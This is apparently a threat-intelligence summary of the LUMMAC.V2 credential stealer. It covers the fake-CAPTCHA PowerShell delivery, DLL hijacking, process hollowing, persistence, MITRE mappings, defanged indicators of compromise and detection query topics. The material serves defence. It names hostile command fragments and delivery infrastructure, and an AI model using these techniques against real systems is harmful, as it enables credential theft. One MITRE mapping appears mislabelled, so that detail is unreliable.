LUMMAC.V2 is a sophisticated credential-stealing malware targeting a wide range of applications, delivered primarily through social engineering involving fake CAPTCHA pages and PowerShell loaders. It employs multiple evasion and persistence techniques, including DLL hijacking, process hollowing, and AutoIt-based droppers, impacting user security and enterprise detection systems. #LUMMAC.V2 #GoogleSecOps #Mandiant
Keypoints
- LUMMAC.V2 is an advanced infostealer malware targeting browsers, crypto wallets, password managers, email clients, and other applications, collecting sensitive data such as credentials, cookies, and screenshots.
- The malware is commonly distributed via “ClickFix” social engineering, where users are tricked into running malicious PowerShell commands disguised as CAPTCHA verification steps.
- The infection lifecycle includes downloading and extracting malicious payloads into AppData folders, followed by execution and persistence via registry Run keys.
- Three main payload delivery variations exist: DLL hijacking exploiting vulnerable executables, process hollowing injecting code into legitimate processes, and an AutoIt-based memory-only dropper with sophisticated anti-analysis checks.
- LUMMAC.V2 uses encrypted and obfuscated communication with command and control servers hosted behind Cloudflare to avoid detection and ensure resilient infrastructure.
- The malware exfiltrates stolen data via HTTP POST requests containing unique identifiers and can receive additional commands or payloads from the C2 server.
- Mandiant and Google SecOps provide Yara-L 2.0 detection queries and custom rules for hunting and detecting LUMMAC.V2 infections and its common techniques in telemetry data.
MITRE Techniques
- [T1218.005] System Binary Proxy Execution: Mshta – Used to trick users into executing mshta.exe to download and execute malicious files. (“Distribution campaigns leading to LUMMAC.V2 have been observed tricking users into executing mshta.exe to fetch a file from a URL and execute its contents.”)
- [T1105] Ingress Tool Transfer – PowerShell commands download malicious payloads from remote URLs using Invoke-WebRequest. (“PowerShell cmdlets that download second stage malware components.”)
- [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell executes obfuscated scripts invisibly to load malware components. (“PowerShell.exe -W Hidden -command … to download and execute script in memory.”)
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Used to concatenate multiple file fragments into a malicious executable with cmd copy /b commands. (“LUMMAC.V2 reconstructs malicious files on hosts by concatenating separate fragments.”)
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence via registry entries pointing to malware in AppData folders. (“The script adds a registry entry under HKCU… ensuring execution upon user logon.”)
- [T1055.012] Process Hollowing – Replacing a legitimate process’s memory with malicious code, such as BitLockerToGo.exe. (“MyDockFinder.exe uses process hollowing to compromise the legitimate Windows process.”)
- [T1574.001] DLL Search Order Hijacking – Dropping malicious DLLs loaded preferentially over legitimate ones to execute malware. (“Setup.exe inadvertently loads the malicious takdecolib.dll instead.”)
- [T1086] PowerShell – Use of Invoke-Expression (iex) and hidden window execution for malware loading. (“PowerShell command runs script in memory using Invoke-Expression.”)
- [T1499] Endpoint Denial of Service (Implied by Anti-analysis techniques) – Anti-analysis checks against sandbox and antivirus applications to evade detection. (“It scans for security applications and employs anti-debugging techniques to avoid analysis.”)
Indicators of Compromise
- [IP Addresses / URLs] Malicious domains used for payload delivery – finalstepgo[.]com, axile[.]shop, cdn5-dispatcher-mp.oss-ap-northeast-2.aliyuncs[.]com
- [File Hashes] Extracted payload SHA256 hash – 842639021ac1b780ee77e7c40ca98745677cbf156764201638b6d33ac8c6f548 (LUMMAC.V2 payload)
- [File Names] Executables and scripts – Perspective.exe, Setup.exe, takdecolib.dll, MyDockFinder.exe, Vkcm1ks1s3.exe, Northwest.bat, A.a3x, Permanent.pif
- [Registry Keys] Persistence key – HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRuntE1koeXl (points to Perspective.exe in AppData)
- [Process Names] Commonly abused processes – mshta.exe, BitLockerToGo.exe, PowerShell.exe
- [Yara-L Queries] Detection signatures targeting mshta.exe with HTTP URLs, PowerShell with encoded commands, cmd copy /b file concatenations, and PowerShell launching executables in AppDataRoaming
Views: 35